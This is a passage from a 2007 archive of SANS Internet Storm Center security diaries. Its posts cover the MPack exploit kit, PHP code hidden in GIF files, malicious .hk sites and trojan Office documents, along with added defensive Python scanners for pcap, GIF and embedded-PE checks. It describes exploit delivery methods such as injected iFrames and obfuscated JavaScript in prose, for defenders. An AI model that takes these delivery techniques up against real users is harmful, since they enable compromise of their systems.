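    return src, dst, sport


def summarize(data, known=KNOWN_HOSTS, services=SERVICES):
    """Count (client, server, service) triples; '_' marks a system we do not know."""
    counts = Counter()
    for frame in iter_frames(data):
        rec = parse_synack(frame)
        if rec is None:
            continue
        server_ip, client_ip, port = rec                 # a SYN/ACK travels server -> client
        key = (known.get(client_ip, "_"), known.get(server_ip, "_"),
               services.get(port, "up:%d" % port))
        counts[key] += 1
    return sorted(counts.items())


def format_rows(rows):
    """Render rows like the diary's 'uniq -c' output: count, client, server, service."""
    return ["%7d %-15s %-15s %s" % (n, c, s, svc) for (c, s, svc), n in rows]


def build_pcap(packets):
    """Constructed little-endian pcap of bare Ethernet/IPv4/TCP headers (no payload, no checksums)."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1))
    for src, dst, sport, dport, flags in packets:
        ip4 = lambda a: bytes(int(x) for x in a.split("."))
        eth = b"\x00" * 12 + b"\x08\x00"
        iph = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0, ip4(src), ip4(dst))
        tcph = struct.pack(">HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
        frame = eth + iph + tcph
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return bytes(out)


# Constructed sample capture: five SYN/ACKs and one plain SYN that the filter should drop.
SAMPLE_PCAP = build_pcap([
    ("12.13.15.163", "203.0.113.9", 80, 40000, SYN | ACK),     # remote client -> minnie:http
    ("12.13.15.163", "203.0.113.10", 80, 40001, SYN | ACK),
    ("12.13.15.166", "203.0.113.9", 22, 40002, SYN | ACK),     # remote client -> pluto:ssh
    ("198.51.100.5", "12.13.14.137", 25, 50000, SYN | ACK),    # dumbo -> remote smtp server
    ("198.51.100.7", "12.13.15.162", 8080, 50001, SYN | ACK),  # goofy -> remote, unnamed port
    ("203.0.113.9", "12.13.15.163", 40000, 80, SYN),            # client's SYN: not a SYN/ACK
])

if __name__ == "__main__":
    import sys
    capture = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    print("\n".join(format_rows(summarize(capture))))
```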

I'll bet you'll be surprised by some of the servers you find.  :-)

-- William Stearns, http://www.stearns.org/


Published: 2007-06-20

MPack Analysis

We mentioned a large MPack compromise in a diary two days ago.  Since then we've been accumulating more information about what is going on behind the scenes.  Earlier today VeriSign/iDefense released some pretty good analysis of how it works, what the value of it is, and other goodies.  This summary does not exist online but has been spread via email to the media and other outlets.  Rather than trying to summarize it, iDefense gave the Internet Storm Center permission to reprint it in its entirety.  Thanks, iDefense!

Greetings All,

MPack is the latest and greatest tool for sale on the Russian Underground.  $ash sells MPack for around $500-1,000. In a recent posting $ash attempted to sell a "loader" for $300 and a kit for $1,000. The author claims that attacks are 45-50 percent successful, including the animated cursor exploit and many others, including ANI overflow, MS06-014, MS06-006, MS06-044, XML Overflow, WebViewFolderIcon Overflow, WinZip ActiveX Overflow, QuickTime Overflow (all these are $ash names for exploits). Attacks from MPack, aka WebAttacker II, date back to October 2006 and account for roughly 10 percent of web based exploitation today according to one public source.

More than 10,000 referral domains exist in a recent, largely successful MPack attack in Italy, compromising at least 80,000 unique IP addresses. It is likely that cPanel exploitation took place on the host provider, leading to injected iFrames on domains hosted on the server. When a legitimate page with a hostile iFrame is loaded the tool silently redirects the victim in an iFrame to an exploit page crafted by MPack. This exploit page, in a very controlled manner, executes exploits until exploitation is successful, and then installs malicious code of the attacker's choice.

Torpig is one of the known payloads for MPack attacks to date. This code relates back to the Russian Business Network (RBN), through which many Internet-based attacks take place today. The RBN is a virtual safe house for attacks out of Saint Petersburg, Russia, responsible for Torpig and other malicious code attacks, phishing attacks, child pornography and other illicit operations. The Italian hosts responsible for most of the domains seen in a recent MPack attack are using cPanel, a Web administration tool for clients.  A zero-day cPanel attack took place in the fall of 2006 leading up to the large scale vector mark-up language (VML) attacks at that time.  It appears likely that the Russian authors of the cPanel exploit, Step57.info, who are also related to the RBN used the exploit to compromise the Italian ISP and referral domains used in the latest mPack attack.

MPack uses a command and control website interface for reporting of MPack success. A JPEG screenshot of a recent attack is attached to this message.


1.  MPack is a powerful Web exploitation tool that claims about 50 percent success in attacks silently launched against Web browsers.

2. $ash is the primary Russian actor attempting to sell mPack on the underground, for about $1,000 for the complete MPack kit.

3. MPack leverages multiple exploits, in a very controlled manner, to compromise vulnerable computers. Exploits range from the recent animated cursor (ANI) to QuickTime exploitation.  The latest version of mPack, .90, includes the following exploits: 

          WinZip ActiveX overflow
          QuickTime overflow

4. The Russian Business Network (RBN) is one of the most notorious criminal groups on the Internet today.  A recent MPack attack installed Torpig malicious code hosted on an RBN server.  RBN is closely tied to multiple attacks including Step57.info cPanel exploitation, VML, phishing, child pornography, Torpig, Rustock, and many other criminal attacks to date.  Nothing good ever comes out of the Russian Business Network net block.

5. MPack attacks experience high success, according to attack log files analyzed by VeriSign-iDefense.  In just a few hours more than 2,000 new victims reported to an MPack command and control website.  A recent attack, largely focused in the area of Italy, involved more than 80,000 unique IPs.

Ken Dunham
Senior Engineer
Director of the Rapid Response Team

Marcus H. Sachs
Director, SANS Internet Storm Center



Published: 2007-06-20

Pump and dump scams now in PDF

Apparently the groups behind what we know as pump and dump spam have found a new way to bypass spam filters. As of yesterday, we’ve been observing e-mails with bogus text, often in German, each with a PDF attached.
These PDFs purport to be stock information, and are usually titled ‘German Stock Insider’. They contain much more detail on the stock than we’re used to from previous pump and dump scams and include images for added realism. They even contain the following disclaimer:
“This is not an offer to buy or sell any security. German Stock Insider discloses that they were paid ten thousand Euros for distribution of this report.”
The messages are usually sent to name@domain with an attachment named name_report.pdf. Apparently they are distributed mostly to .com and .org domains, though most of the reports we’ve received were from Europe. Each of the reports so far has had an MD5 hash of 2e4b2158909f276942dadf6a0b621b1a. Thanks to Günter for reporting his findings.


Published: 2007-06-20

Other miscellaneous stuff I've come across recently


Complexity is bad for security


I've mentioned before that I read Spaf's blog.  He doesn't post too often, but he had a story last week that really resonated with me (and he referenced the story where the Mac+ beat a new AMD machine running XP in 53% of the tests they ran).  I started programming on machines where 256KB was a lot of RAM and 256MB was a whole lot of disk (yes, I have been doing this a while).  Everyone likes all their new features, but that has resulted in bloated, unmaintainable code, and the size and complexity have a cost in security.


Honeypot-type fake service scripts/tools

Also, these fake SMB tools have been out a couple of months, but I missed them until they were mentioned this morning on the Darknet blog.  These are useful additions to the tools I run in my malware analysis environment to spoof other services.  Also, on the French Honeynet Project tools page are fake SNMP tools that I'll have to take a look at too.  Does anyone have a good compilation of these tools?  Let me know via the contact page and I'll summarize the results next week.



Published: 2007-06-20

Apple TV security update

Apple has released a bulletin and update to their Apple TV software which fixes a buffer overflow (with possible remote code execution) in its UPnP IGD code (CVE-2007-2386; this is related to recent Mac OS X updates).  The devices should install the update automatically during their weekly check for updates.


Published: 2007-06-19

PHP code in GIF (Part 2)

The GIF + PHP code article from yesterday generated some good email.  Here is a good document that explains some of the mitigation techniques and explains the problems in more detail:  http://www.scanit.be/uploads/php-file-upload.pdf


Published: 2007-06-19

PHP Exploit Code in a GIF

So if you want to hide something, where is the best place to hide it?
In plain sight of course.  We received an email from Steve Caligo
about a major image hosting website that contained more than you
bargained for in at least one image.  No, it's not stego or porn.  In
one particular image file, there was a PHP coded exploit script.
Interestingly enough, the file itself contains a completely legitimate
1x1 gif image at the beginning of the file.  Doing a quick check for
the filetype:

 $ file cmdscanvt6.gif
cmdscanvt6.gif: GIF image data, version 89a, 1 x 1

So now you have exploit code in what appears to be a gif file, what
can you do with that?  Well, a couple of quick things come to mind.  One
idea was alluded to with the comment about hiding it in plain sight.
It is a clever way to pass exploit code to others without it setting
off alarms or attracting attention all while bypassing network
security tools.  Steve reported it to the website owners and now a
quick check back of the site shows a completely different file with
the same name there now. So who switched the image?  The person who
placed it there to begin with or the folks running the website?

The second idea, completely untested at this point, is that PHP
will ignore everything else and just look for its delimiters, which
means it would be a great method for an RFI attack.

Regardless, it's interesting and scary to find a file that acts like a
regular gif file, but contains a script exploit.  Nice catch Steve,
thanks for passing it along!
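A defender's check for the "valid image plus PHP" file described here (and for the upload mitigation question raised in Part 2 above), as an added example that is not from the diary or from Steve Caligo: it walks the GIF block structure to find where the image really ends, counts the bytes that follow, and looks for a PHP open tag anywhere in the file. The sample files are constructed inside the block.

```python
"""Find where a GIF really ends and whether PHP code rides along after (or inside) it.

Added example, not from the diary or from Steve Caligo: a small GIF block walker that
locates the trailer byte, reports any bytes after it, and finds a PHP open tag anywhere
in the file (including inside comment extensions). The sample files are constructed here.
"""
import struct

PHP_OPEN_TAG = b"<?php"     # short tags like '<?' are too common in binary data to match on


def _skip_subblocks(data, off):
    """Step over a chain of data sub-blocks (length byte + payload) ending with a 0 byte."""
    while True:
        if off >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[off]
        off += 1
        if n == 0:
            return off
        off += n


def gif_end_offset(data):
    """Return the offset just past the GIF trailer (0x3B) by walking the block structure."""
    if data[:6] not in (b"GIF87a", b"GIF89a") or len(data) < 13:
        raise ValueError("not a GIF header")
    packed = data[10]                                     # logical screen descriptor flags
    off = 13
    if packed & 0x80:                                     # global color table: 3 * 2^(N+1) bytes
        off += 3 * (2 << (packed & 0x07))
    while off < len(data):
        block = data[off]
        off += 1
        if block == 0x3B:                                 # trailer: the image ends here
            return off
        if block == 0x21:                                 # extension: label byte, then sub-blocks
            off = _skip_subblocks(data, off + 1)
        elif block == 0x2C:                               # image descriptor (9 bytes)
            lpacked = data[off + 8]
            off += 9
            if lpacked & 0x80:                            # local color table
                off += 3 * (2 << (lpacked & 0x07))
            off = _skip_subblocks(data, off + 1)          # LZW min code size, then image data
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (block, off - 1))
    raise ValueError("missing GIF trailer")


def inspect_gif(data):
    """Report whether the GIF parses, how many bytes follow it, and where a PHP tag sits."""
    result = {"valid_gif": False, "trailing_bytes": 0, "php_tag_at": None}
    try:
        end = gif_end_offset(data)
        result["valid_gif"] = True
        result["trailing_bytes"] = len(data) - end
    except (ValueError, IndexError):
        pass
    pos = data.find(PHP_OPEN_TAG)
    if pos != -1:
        result["php_tag_at"] = pos
    return result


def build_1x1_gif():
    """Constructed valid 1x1 GIF89a with a two-entry global color table."""
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)   # 0x80: GCT present, 2 entries
    gct = b"\x00\x00\x00\xff\xff\xff"
    image = b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)         # image descriptor, no local table
    image += b"\x02" + b"\x02\x44\x01" + b"\x00"                     # LZW min code size 2, one sub-block, end
    return header + gct + image + b"\x3b"


CLEAN_GIF = build_1x1_gif()
# Constructed stand-in for the file in the diary: a complete image followed by PHP.
# The appended PHP is only a placeholder comment.
GIF_WITH_PHP = CLEAN_GIF + b"<?php /* placeholder */ ?>"

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else GIF_WITH_PHP
    print(inspect_gif(blob))
```

A file that `file` calls a GIF but that has trailing bytes or a PHP tag after the trailer is the case described above; an upload handler can re-encode the image instead of storing the original bytes.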


Published: 2007-06-18

Vulnerability in Trillian

Trillian is a very popular instant messenger client.  iDefense found a bug in version 3.x.  Details are on the Cerulean Studios Blog page, as well as at iDefense.

Update now.

Marcus H. Sachs
Director, SANS Internet Storm Center



Published: 2007-06-18

Massive MPACK Compromise

If you're confused and thinking of the mime packer at this point, then
you haven't heard of "the other" mpack.  Let me introduce to you the
relatively new kid on the block.  MPACk is a tool that was first
discovered in December of 2006 by PandaLabs.

It's a PHP-based application designed to run on a server.  With it
comes several different exploits (you can buy new ones to add on)
which can be used to compromise a user's system based on what they are
running.  There are different methods to get a user to access the
compromised server.  One of the more popular methods being used right
now is an IFRAME.  Websites are compromised and IFRAMES are placed on
the sites pointing to the MPACK server.

Another interesting characteristic of this tool is the fact it has a
database backend.  What this allows is the tracking of information and
report generation on all the infected systems.  Right now it's being
reported by Websense that there are over 10,000 compromised systems
all with IFRAMES pointing to the MPACK server.

As a side note, keep your eye out for another tool called
DreamDownloader that is usually sold with MPACK.  DreamDownloader is
a dangerous script kiddie toy.  All they have to do is tell the tool the
URL where the file is located that they want downloaded and it creates
an executable (with your choice of packers) that carries out the

For more information, check out these sites:



Published: 2007-06-16

New Hacker Challenge for you all

There is a new hacker challenge up on the ethical hacker network based on Serenity.

Matt who works with fellow handlers Ed and Mike has put this one together for us all to enjoy on, what is here a wet and cold weekend.  The challenge can be found here, enjoy.

Mark H - Shearwater


Published: 2007-06-16

Attack involving .hk domains

Eric, one of our many valued contributors wrote in yesterday with various spam messages that contained nothing but a short piece of text and a link to a very simple HK domain. Different domains were used in each message.

Subject line: Hello, Pal
Body: look


When investigating this, we noticed that these domains have no less than 10 authoritative nameservers. Most interesting is that each of these appears to be located within an ISP's dynamic IP address range. This is naturally highly suspicious. Random querying for A records shows that a large number of other compromised hosts are being used to host the actual website.

On each of these servers, the index.html page contains nastiness:

  • One piece of obfuscated javascript code, that once decoded appears to exploit a known vulnerability in msdss.dll;
  • One piece of obfuscated javascript which contains iframe inclusion of three other files, exp1.htm, exp2.htm and exp3.htm and a link to an icon file 123.htm. The three HTM files attempt to exploit three vulnerabilities in Internet Explorer, the 123.htm file in fact turns out to be a malicious ANI file.
  • A final piece of human readable text that invites a user to click on a link, should the ‘download not start automatically’. Once you click on this link, a file ‘fun.exe’ will be downloaded from this same web server.

The resulting file ‘fun.exe’ appears to be different on each single server. We have currently seen the following SHA1 hashes:


Detection of the code by regular Anti-virus is very spotty, shown by the following output of Virustotal. These were the only solutions that detected malicious code. As you can see, even these are mostly generic detections:

BitDefender 7.2 06.16.2007 GenPack:Trojan.Peed.NG
CAT-QuickHeal 9.00 06.15.2007 (Suspicious) - DNAScan
DrWeb 4.33 06.16.2007 Trojan.Packed.138
eSafe 06.14.2007 Suspicious Trojan/Worm
Fortinet 06.16.2007 suspicious
F-Secure 6.70.13030.0 06.15.2007 Tibs.gen111
Kaspersky 06.16.2007 Email-Worm.Win32.Zhelatin.eu
Norman 5.80.02 06.15.2007 Tibs.gen111
Sophos 4.18.0 06.12.2007 Mal/EncPk-E
Sunbelt 2.2.907.0 06.16.2007 VIPRE.Suspicious
Webwasher-Gateway 6.0.1 06.16.2007 Worm.Win32.Malware.gen (suspicious)

This type of well-prepared and extensive attack is very difficult to shut down, mostly due to the number of servers and authorities involved. As such, the most effective way of responding would be to have the domain itself taken down. This issue has been reported to the HKCERT as well as the administrators of the .hk TLD. In addition, we’re working with anti-virus vendors to improve coverage of both the resulting file and the trojan droppers being used on the malicious site.

Maarten Van Horenbeeck


Published: 2007-06-15

safari update

Apple has released a new version of the public BETA safari browser (3.0.1) to address the three vulnerabilities announced earlier this week.
It is available here: http://www.apple.com/safari/download/

From http://lists.apple.com/archives/Security-announce/2007/Jun/msg00000.html
"CVE-ID:  CVE-2007-3186
Available for:  Windows XP or Vista
Impact:  Visiting a malicious website may lead to arbitrary code
Description:  A command injection vulnerability exists in the Windows
version of Safari 3 Public Beta.  By enticing a user to visit a
maliciously crafted web page, an attacker can trigger the issue which
may lead to arbitrary code execution.  This update addresses the
issue by performing additional processing and validation of URLs.
This does not pose a security issue on Mac OS X systems, but could
lead to an unexpected termination of the Safari browser.

CVE-ID:  CVE-2007-3185
Available for:  Windows XP or Vista
Impact:  Visiting a malicious website may lead to an unexpected
application termination or arbitrary code execution
Description:  An out-of-bounds memory read issue in Safari 3 Public
Beta for Windows may lead to an unexpected application termination or
arbitrary code execution when visiting a malicious website.  This
issue does not affect Mac OS X systems.

CVE-ID:  CVE-2007-2391
Available for:  Windows XP or Vista
Impact:  Visiting a malicious website may allow cross-site scripting
Description:  A race condition in Safari 3 Public Beta for Windows
may allow cross site scripting.  Visiting a maliciously crafted web
page may allow access to JavaScript objects or the execution of
arbitrary JavaScript in the context of another web page.  This issue
does not affect Mac OS X systems."


Published: 2007-06-15

BBB=>IRS=>FTC=>Proforma | don't open that invoice!

Several of our ever-vigilant readers have warned us of a new targeted Trojan “document” that is being sent out specifically to executives in corporations.
Thanks Dan, Andy and Joe!
Subject of the emails were of the form:

Proforma Invoice for "Company Name" (Attn: "Executive Name")

The Body of the email included this text


"The Proforma Invoice is attached to this message. You can find the file
in the attachments area of your email software.

PS: The invoice also includes the cost for the services provided for the
second quarter of 2007.
Please read, evaluate and reply with any comments. Thanks."

It is another word “document” with a malicious embedded object similar to the BBB, IRS, FTC and other targeted trojan “documents” we have seen lately.

The file sent is Proforma_Invoice.doc
Those AV vendors that recognized it at VirusTotal were:

Authentium 4.93.8 06.15.2007 W32/Dropper.ESR
Fortinet 06.15.2007 W32/Nuclear!tr
Sophos 4.18.0 06.12.2007 Troj/BHO-BP
Symantec 10 06.15.2007 Downloader
Panda 06.15.2007 Suspicious file

The document itself contains an icon of a pair of books (blue and yellow) and a magnifying glass and the text
The icon represents a “Packaged Object”.

Clicking the icon in XPsp2 resulted in a windows popup box that stated:
“The publisher could not be verified. Are you sure you want to run this software?
Publisher: Unknown Publisher
Type: Application”

The three copies we have seen so far were all the same, all were 689,152 bytes long and all had a md5 hash of 47fff5b9d3765b70571454146ea9f244.

A word of caution: Do NOT open strange documents or run untrusted binaries on a machine you don’t wish to format and reinstall the OS on!
Most of us who do malware analysis have a machine on which we can reinstall a fresh, clean copy of the OS if things go wrong, and the ability to watch our network to see if anything is going wrong.


Published: 2007-06-14

Office of Cyber Public Health?

Joe St. Sauver, security and spam researcher at the University of
Oregon, points out that botnets are a symptom; the cause is infected
systems.  We can't clean up the bots without cleaning up the infected
systems first.

His paper for the Anti-Phishing Working Group is here

As you read it, ask yourself these questions.  If you think his proposal
wouldn't work, what would you recommend instead?  Would your proposal be
more likely to succeed?  Why?

-- Bill


Published: 2007-06-13

IRS goes FTC

After the recent BBB and the IRS scams, Sam Masiello has written in to let us know they're seeing new scam e-mails originating from the FTC. These are trying to convince you that you have filed a complaint, of which a copy is supposedly included in the attachment.

This attachment is still an RTF file with a malicious embedded object. These attacks are targeted to executives and management, so if your organization was affected by the previous ones, make sure your employees are aware of this one as well.


Published: 2007-06-13

FBI's Operation Bot Roast

Jonny wrote in pointing us to this FBI press release. In this document, the FBI provides some more information on their Operation Bot Roast, which recently hit the news stands as a result of the arrest of suspected spammer Robert Alan Soloway.
No doubt this is great news for the community. Spamming, merely one threat exacerbated by botnets, has become a huge problem, and technical means are obviously not the best way to fix it. Spam will continue to move closer in appearance to regular mail, making it difficult for us to filter it out, and making e-mail less and less usable as a means of communication. As such, government intervention to stop these practices should be applauded.
Whether these arrests will do much to relieve the increasing botnet count remains to be seen. In order to prevent these botnets from being taken over by foreign botherders, laws will need to be aligned globally. In addition, the fact that these machines got infected and remained part of a botnet in the first place shows there is a problem with the ongoing security practices of their users, administrators or hosters. To relieve this threat, we as security practitioners also need to do our bit to monitor the networks under our control, understand we have a problem, and take corrective action. In combination with enforced legislation, this will move us forward.
Maarten Van Horenbeeck


Published: 2007-06-13

Investigating and responding to suspicious Office files

A major step in incident handling is to confirm whether a security incident is in fact taking place. Excessive handling of false positives can also cost an organization dearly in the long run. Recently, attacks using Office (or other office applications such as Ichitaro) as a vector have become more popular, making this identification stage a bit more difficult.

Some small tools can come in really useful if you want to avoid attaching a debugger to your Word session. Consider using your stock anti-virus. In many cases, it might be able to spot malicious files when they exploit a known vulnerability. Some names attributed to malicious Word files so far appear to generically trigger on malicious files:


Other vendors decided not to include patterns for exploitative Word documents, but provide them for their payload only, when it gets executed. While this generates fewer false positives, it also provides less protection against malicious code that is targeted, or has only recently been distributed. It also misses the exploit on the e-mail gateway. You may want to check in with your vendor to see what their approach to the issue is.

Another tool that is still useful is the regular hex-editor, or even strings. Seeing the MZ ‘magic’ and a stub executable, or even the UPX markers in a Word file is unusual:

dhahran:/tmp# hexdump -C malicious.doc | grep "UPX"
0103d0 55 50 58 30 00 00 00 00 00 20 12 00 00 10 00 00 |UPX0..... ......|
0103f0 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 |........UPX1....|
010420 55 50 58 32 00 00 00 00 00 10 00 00 00 60 12 00 |UPX2.........`..|
0105e0 55 50 58 21 0c 09 05 06 5c 5d 41 a8 32 6d b5 68 |UPX!....\]A.2m.h|
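The hexdump/strings check above, automated as an added example (not one of the tools the diary names): it locates every MZ header in a file whose e_lfanew points at a real PE signature and reads the section table, so UPX0/UPX1 section names show up directly instead of as a grep hit. The sample document is constructed inside the block.

```python
"""Look for an embedded MZ/PE executable (and UPX section names) inside a suspicious Office file.

Added example, not one of the tools the diary names: it automates the hexdump/strings
check by locating every 'MZ' header whose e_lfanew points at a real 'PE\\0\\0'
signature and reading the section table. The sample document is constructed here.
"""
import struct

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound document header, used by .doc/.xls/.ppt


def pe_sections_at(data, mz_off):
    """If an MZ header at mz_off leads to a valid PE header, return its section names, else None."""
    if data[mz_off:mz_off + 2] != b"MZ" or mz_off + 0x40 > len(data):
        return None
    e_lfanew = struct.unpack_from("<I", data, mz_off + 0x3C)[0]
    pe = mz_off + e_lfanew
    if pe + 24 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        return None
    nsect = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    table = pe + 24 + opt_size                      # section table follows the optional header
    names = []
    for i in range(nsect):
        entry = table + 40 * i                       # IMAGE_SECTION_HEADER is 40 bytes
        if entry + 40 > len(data):
            return None
        names.append(data[entry:entry + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def scan_for_embedded_pe(data):
    """Every offset where an MZ/PE image starts, with its section names."""
    hits = []
    off = data.find(b"MZ")
    while off != -1:
        names = pe_sections_at(data, off)
        if names is not None:
            hits.append((off, names))
        off = data.find(b"MZ", off + 1)
    return hits


def assess(data):
    """Summarize what a hex editor would show: OLE2 magic, embedded PEs, UPX section names."""
    hits = scan_for_embedded_pe(data)
    return {
        "is_ole2": data[:8] == OLE2_MAGIC,
        "embedded_pe": hits,
        "upx_packed": any(n.startswith("UPX") for _, names in hits for n in names),
    }


def build_pe_stub(section_names):
    """Constructed MZ/PE header with the given sections; headers only, not a runnable program."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew at 0x3C -> PE at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x0102)  # opt header size 0
    sections = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + sections


# Constructed stand-in for malicious.doc: a 512-byte OLE2 header sector followed by a UPX-packed PE.
SAMPLE_DOC = OLE2_MAGIC + b"\0" * 504 + build_pe_stub(["UPX0", "UPX1", ".rsrc"])

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DOC
    for key, value in assess(blob).items():
        print("%-12s %s" % (key, value))
```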

Other useful tools have been released by Sourcefire and SecureWorks. Sourcefire’s OfficeCat scans an Office file for the exploitation of a long list of known vulnerabilities.

Sourcefire OFFICE CAT v2
* Microsoft Office File Checker *
Processing c:\office\malcode2.doc

SecureWorks’ Fess, short for File Exploit Scanning System, is an open-source tool that scans files for exploits using a Snort-like inspection language. Its basic release does not contain Office sigs, but one was released a few months later on the Fess-users mailing list. It’s a powerful tool, but you may need to write signatures yourself based on what specifically you are looking for. It’s a tool that would allow you to scan Office files for shellcode, for example.

Microsoft also has tools to bring clarity into the format. In essence, Microsoft Office files are of OLE Structured Storage nature, and consist of numerous ‘storage’ and ‘stream’ items. In order to identify each of the storage items, at the end of 2006, Microsoft released a tool called STG, which can display the different structure components and their contents. This can prove valuable when you’re trying to identify malicious components. Many of you may have worked with a similar tool, DocFile viewer, part of Visual Studio.

In May of this year, Microsoft also released two tools to control the Office targeting issue. The Microsoft Office Isolated Conversion Environment converts Office 2003 documents to the Office Open XML format. This should strip out any exploits that are present and present the file ‘safely’ to recent Office versions. There are some constraints, such as macros, smart tag data and embedded documents, which cannot be converted.

The other, File Block functionality for Office allows administrators to restrict supported file types for Office through the registry and GPO. By testing and combining both applications, an organization can proactively prepare an emergency plan that can be activated should a significant threat appear.

Do you have other tools or methodology you use to deal with this threat? Get in touch!

Maarten Van Horenbeeck


Published: 2007-06-12

June 2007, Microsoft Patch Tuesday Overview.

Overview of the June 2007 Microsoft patches and their status.

Affected                                                     KB         Known exploits     Microsoft rating  ISC rating(*) clients / servers
Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution
  Visio 2002, Visio 2003                                     KB 927051  No known exploits  Important         Critical / Important
Vulnerability in Schannel Could Allow Remote Code Execution
  Windows 2000, Windows XP, Windows Server 2003              KB 935840  No known exploits  Critical          Critical / Critical
Vulnerability in Windows Vista Could Allow Information Disclosure
  Windows Vista                                              KB 84693   No known exploits  Moderate          Moderate / Moderate
Cumulative Security Update for Internet Explorer
  Internet Explorer                                          KB 933566  No known exploits  Critical          Critical / Important
Cumulative Security Update for Outlook Express and Windows Mail
  Outlook Express (XP, 2003), Windows Mail (Vista)           KB 84693   No known exploits  Critical          Critical / Important
Vulnerability in Win32 API Could Allow Remote Code Execution
  Windows 2000, Windows XP, Windows Server 2003              KB 935839  No known exploits  Critical          Critical / Critical

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**)Further clarification from the more generic text above: typical clients would not use DNS or exchange servers. If they are, questions as to them being used as a client should be posed.


Published: 2007-06-12

Beta Software (Safari for Windows)

We got an unusual number of e-mails regarding the vulnerabilities in yesterday's release of Safari for Windows. I was a bit hesitant to cover it in a diary. After all, it's beta software. We all know better than to use beta software in production. So the operational impact of these issues should be nil.

Now... on the other hand, I own two Apple computers. So I know the power of the brushed-metal kool-aid. So let's talk about beta software in general. You've got a sales guy in jeans and a black turtleneck, or a monkey running across a banner ad, telling you about the latest and greatest version of product "X". "Now with even more of must-have 'Y'".

So how do you resist? I've found it's usually impossible. However, you can minimize the impact. Keep a "beta" machine around. Use it to install all the free trials, latest beta versions and other junk. The machine will soon become too unstable to use, making the desire for even more free-trial-super-feature-enhanced software wane quickly.

In very few cases you may want to use a beta product or a version downloaded and compiled from CVS. But these cases should be limited and strictly controlled. A couple of check points for approving a beta solution:

* Do we actually need the software?
* Is there a workaround that will make the "release" version workable?
* Is there a competing product that will do the job?
* What's the track record of the vendor (will they always point to the next version that's just about to be released)?
* How can we test if this beta software actually does what it promises?

Similar rules should be applied to any version upgrade or new software, even if it's a "release". Sometimes it's better to stick with an older version for a while. At least you know how to work around its bugs.

Oh, and I am still typing this diary on my 3+ year old Linux system. It's the system I use to actually get work done.


Published: 2007-06-11

Internal Audits, many of us hate them, but....

They serve a valid purpose as part of a comprehensive security program. In fact, quite a number of standards insist on internal audits being conducted. For example, you cannot certify to ISO/IEC 27001 without an internal audit process. The internal audit can be conducted by specific groups, external parties or other staff in the section. However, they often suffer from a stigma. By some they are seen as an evil process where the nasty auditor is out to get you. This obviously doesn’t help, and yes, like some of you I’ve been in the situation where the auditor behaves like the smiling assassin: smiling and agreeing, until the report comes out and your back starts to hurt.

But... I have also had the pleasure of being involved in internal audits where the main objective was to improve the overall security and the security group and the auditors work together to highlight issues that need to be addressed.

So are they useful? Why not just perform a security assessment or a penetration test? A security assessment or penetration test typically highlights some of the more obvious issues, but only an internal audit will get into the nuts and bolts of things. It is used to verify that what is written down is being done. Audits are more focussed and are often conducted by people who know and understand the organisation and therefore may be more aware of the subtle nuances that are present.

A good internal audit can help you identify gaps and issues with the processes that have been implemented to manage security within the organisation. Those logs, are they really being reviewed? Is the password reset procedure being followed? Or, in an outsourced situation, is the outsourcer really doing what the contract says they should? Are incidents handled correctly? One major benefit I’ve seen is that underlying issues are identified; another, as I mentioned, is that it helps highlight issues that people have often tried to raise previously. I’ve seen many an example whereby a security issue was addressed only after an internal audit highlighted the problem, despite the fact that it had been raised previously by the security group. One reason may be that audit reports are often reviewed at board level, whereas security issues raised may never reach that high.

So if you are being audited, try and work with the auditor to get the issues you know exist addressed; you may also learn of some you weren’t aware of. If you are the auditor, be upfront and make sure there are no surprises in the report. If you identify issues, discuss them with the other party; there may be a simple explanation rather than a conspiracy to deceive.

Remember, we're all working towards the same goal.

Mark H. - Shearwater


Published: 2007-06-10

Malware Analysis - handling base64

I love working in information security. That’s a fact. :) I also really like to play with malware analysis, and for some time now, that’s what I do for a living :). And guess what I do in my free time?? :) Yes, play with malware analysis too :).

